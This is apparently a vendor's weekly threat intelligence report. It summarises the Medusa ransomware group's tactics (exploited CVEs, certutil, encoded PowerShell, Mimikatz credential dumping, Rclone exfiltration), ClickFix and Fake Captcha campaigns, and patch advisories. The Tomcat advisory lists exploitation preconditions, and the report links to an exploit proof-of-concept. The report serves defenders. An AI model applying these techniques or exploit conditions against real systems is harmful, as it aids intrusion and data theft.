Cyber Threat Intelligence Report

This week we briefed our clients on a #StopRansomware advisory on Medusa and campaigns we've seen from ClickFix and Fake Captcha.

 KEY TAKEAWAYS 

• New #StopRansomware advisory from CISA and FBI for Medusa RaaS. Learn the group’s TTPs so you can protect your organization.

• ClickFix and FakeCaptcha attacks are here to stay for 2025.

• Critical vulnerabilities in Veeam, Fortinet, and Apache Tomcat. Patch now!

Medusa Ransomware TTPs

This month, CISA and the FBI released a joint #StopRansomware advisory for Medusa, a double extortion ransomware-as-a-service (RaaS) group first identified in June 2021. In recent months, the group has been gaining momentum, impacting over 300 organizations across a variety of industry verticals including medical, education, legal, insurance, technology, and manufacturing. This Medusa ransomware variant should not be confused with MedusaLocker or the Medusa mobile malware variant.

Initial Access

Medusa has been observed using both phishing and remote exploitation to gain initial access. With the phishing attacks, they are used simply to gain the victim's credentials for remote access. When the group uses remote exploitation, they have been observed leveraging known vulnerabilities such as CVE-2024-1709 (authentication bypass in ScreenConnect) and CVE-2023-48788 (Fortinet EMS SQL Injection).

Network Discovery

Once Medusa has a foothold in the target environment, they use living-off-the-land (LOTL) and other legitimate tools such as Advanced IP Scanner and SoftPerfect Network scanner for enumeration. Medusa tends to restrict their scans to common ports and services, such as 21/FTP, 22/SSH, 23/Telnet, 80/HTTP, 115/SFTP, 443/HTTPS, 1433/SQL, 3050/Firebird, 3128/HTTP proxy, 3306/MySQL, and 3389/RDP.

Defense Evasion

The group heavily relies on LOTL techniques to avoid detection. They use Certutil (certutil.exe) to download additional files and payloads. Medusa also heavily uses Base64-encoded PowerShell commands, and then deletes the PowerShell command line history. For command and control (C2), they use off the shelf tools to hide their activity such as Ligolo and Cloudflared.

Lateral Movement

Medusa uses a versatile range of remote access tools for lateral movement, shifting tools depending on what is available in the target network. They have been observed abusing AnyDesk, Atera, ConnectWise, eHorus, N-able, PDQ Deploy, PDQ Inventory, SimpleHelp, and Splashtop, as well as traditional RDP. The group will go so far as to run a batch script enabling RDP access on the local firewall. To harvest credentials for further privilege escalation and lateral movement, Medusa has been observed using Mimikatz for LSASS dumping.

Data Exfiltration and Encryption

Medusa typically uses Rclone to exfiltrate data to their C2 servers. In order to deploy their encryptor, gaze.exe, across the network, Medusa leverages LOTL tools such as PsExec, PDQ Deploy, or BigFix. The group will attempt to disable Windows Defender and other AV tools in the environment before the encryptor is detonated.

How to Protect Your Organization

Protecting your organization from threats like Medusa are similar to other ransomware threats:

• Use strong passwords in combination with multi-factor authentication (MFA).
• Keep operating systems and software up to date. Actively applying patches in a timely manner, especially to internet-facing assets, is crucial for preventing initial access.
• Have fully up to date EDR tools deployed across all possible endpoints.
• Use network monitoring tools such as PacketWatch to detect anomalous network traffic.
• Implement robust network segmentation.
• Disable unused ports and services.
• Limit which accounts have administrative privileges (principle of least privilege).
• Document and baseline usage of approved software to make LOTL and anomalous behavior easier to identify.
• Maintain offline backups of data and regularly test and maintain these backups.

Resources:

• https://www.cisa.gov/sites/default/files/2025-03/aa25-071a-stopransomware-medusa-ransomware.pdf
  

• https://github.com/cloudflare/cloudflared
  

• https://github.com/Nicocha30/ligolo-ng
  

• https://github.com/gentilkiwi/mimikatz

NPSA: ClickFix & Fake Captcha are Here to Stay

Over the past 3 months, PacketWatch Threat Intelligence has documented ClickFix and Fake Captcha campaigns on 3 separate occasions [1][2][3]. Both attacks involve tricking the user into opening a command terminal and then pasting and executing malicious code copied over from the clipboard. With ClickFix, this site will give a fake error message, stating that to fix the problem the user needs to run the malicious command. With Fake Captcha, the user is presented with what looks like a "verify you are human" captcha portal, where they are instructed to run the malicious command to prove they are human. These tactics are becoming increasingly widespread and are being leveraged to deploy infostealer malware to large numbers of victims.

Just in the last 2 weeks, there have been several new campaigns reported:

• A large set of WordPress sites were compromised to deliver Lumma Stealer.
• A phishing campaign attributed to Storm-1865 where emails impersonating booking[.]com were using ClickFix to push infostealers and remote access trojans.
• Over 100 auto dealership websites were compromised to display ClickFix errors, leading to the delivery of SectopRAT. PacketWatch directly observed this campaign and can confirm that MDR customers are protected from this infection chain.

Having network monitoring and detection such as PacketWatch endpoint detection tools across all endpoints can detect and block these intrusions. However, the most important tool in combating these types of social engineering attacks is user awareness training. ClickFix and Fake Captcha attacks are here to stay for 2025 and beyond, and all users should be made aware of what the attacks look like so they can avoid running the commands. Administrators can also take an additional step by disabling PowerShell and the Command Prompt via GPO.

Resources:

• https://packetwatch.com/resources/threat-intel/cyber-threat-intelligence-12-30-2024
  

• https://packetwatch.com/resources/threat-intel/cyber-threat-intelligence-01-13-2025
  

• https://packetwatch.com/resources/threat-intel/cyber-threat-intelligence-03-10-2025
  

• https://www.microsoft.com/en-us/security/blog/2025/03/13/phishing-campaign-impersonates-booking-com-delivers-a-suite-of-credential-stealing-malware/
  

• https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
  

• https://rmceoin.github.io/malware-analysis/2025/03/13/supply-chain.html
  

• https://malpedia.caad.fkie.fraunhofer.de/details/win.sectop_rat
  

• https://thehackernews.com/2025/03/clearfake-infects-9300-sites-uses-fake.html 

Vulnerability Roundup

Critical RCE in Veeam Backup & Replication

On March 19, Veeam published a security advisory for a new critical remote code execution (RCE) vulnerability, tracked as CVE-2025-23120, that affects Backup & Replication systems that are domain joined. Per the advisory, all supported versions of Backup & Replication are affected. While no proof-of-concept code has yet to be observed in the wild, administrators are urged to upgrade to version 12.3.1 (build 12.3.1.1139) or higher as soon as possible.

• https://www.veeam.com/kb4724
• https://www.rapid7.com/blog/post/2025/03/19/etr-critical-veeam-backup-and-replication-cve-2025-23120/

Fortinet Vulnerability Under Active Exploitation

Last week, CISA added CVE-2025-24472 to their Known Exploited Vulnerabilities (KEV) catalog. This vulnerability, along with CVE-2024-55591, are a pair of critical authentication bypass vulnerabilities disclosed earlier this year that are often abused together to gain super-admin privileges on affected FortiOS and FortiProxy versions.

• FortiOS 7.0.0 through 7.0.16 (Upgrade to 7.0.17 or above)
• FortiProxy 7.2.0 through 7.2.12 (Upgrade to 7.2.13 or above)
• FortiProxy 7.0.0 through 7.0.19 (Upgrade to 7.0.20 or above)

Administrators are urged to apply updates as soon as possible if they have not been done so already. Additionally, it is highly recommended to disable management interface access to the open internet and restrict access only to trusted IP addresses.

• https://www.cisa.gov/known-exploited-vulnerabilities-catalog
  

• https://www.darkreading.com/cyberattacks-data-breaches/critical-fortinet-vulnerability-draws-fresh-attention
  

• https://packetwatch.com/resources/threat-intel/cyber-threat-intelligence-01-27-2025
  

• https://www.fortiguard.com/psirt/FG-IR-24-535

Apache Tomcat RCE Under Active Exploitation

A critical remote code execution flaw in Apache Tomcat was disclosed on March 10, 2025. Tracked as CVE-2025-24813, the vulnerability allows an unauthenticated remote attacker to view or modify content of files on the server. Affected versions are Apache Tomcat 11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, and 9.0.0.M1 to 9.0.98. For the exploit to work, the following conditions must be met:

• Writes enabled for the default servlet (readonly= "false") — (Disabled by default)
• Support for partial PUT is enabled (Enabled by default.)
• Security-sensitive uploads occur in a sub-directory of a public upload directory.
• The attacker knows the names of security-sensitive files being uploaded.
• These security-sensitive files are being uploaded using partial PUT.

Proof-of-concept code is in the wild, and the vulnerability is being actively exploited. Administrators are urged to apply updates as soon as possible. This vulnerability may also be mitigated by reverting to the default servlet configuration readonly="true", by turning off partial PUT support, and avoid storing security-sensitive files in a subdirectory of public upload paths.

• https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
  

• https://lab.wallarm.com/one-put-request-to-own-tomcat-cve-2025-24813-rce-is-in-the-wild/
  

• https://thehackernews.com/2025/03/apache-tomcat-vulnerability-comes-under.html
  

• https://www.bleepingcomputer.com/news/security/critical-rce-flaw-in-apache-tomcat-actively-exploited-in-attacks/
  

• https://github.com/iSee857/CVE-2025-24813-PoC/blob/main/Tomcat_CVE-2025-24813_RCE.py
  

• https://nvd.nist.gov/vuln/detail/CVE-2025-24813

This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.

Subscribe to be notified of future Reports:

NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.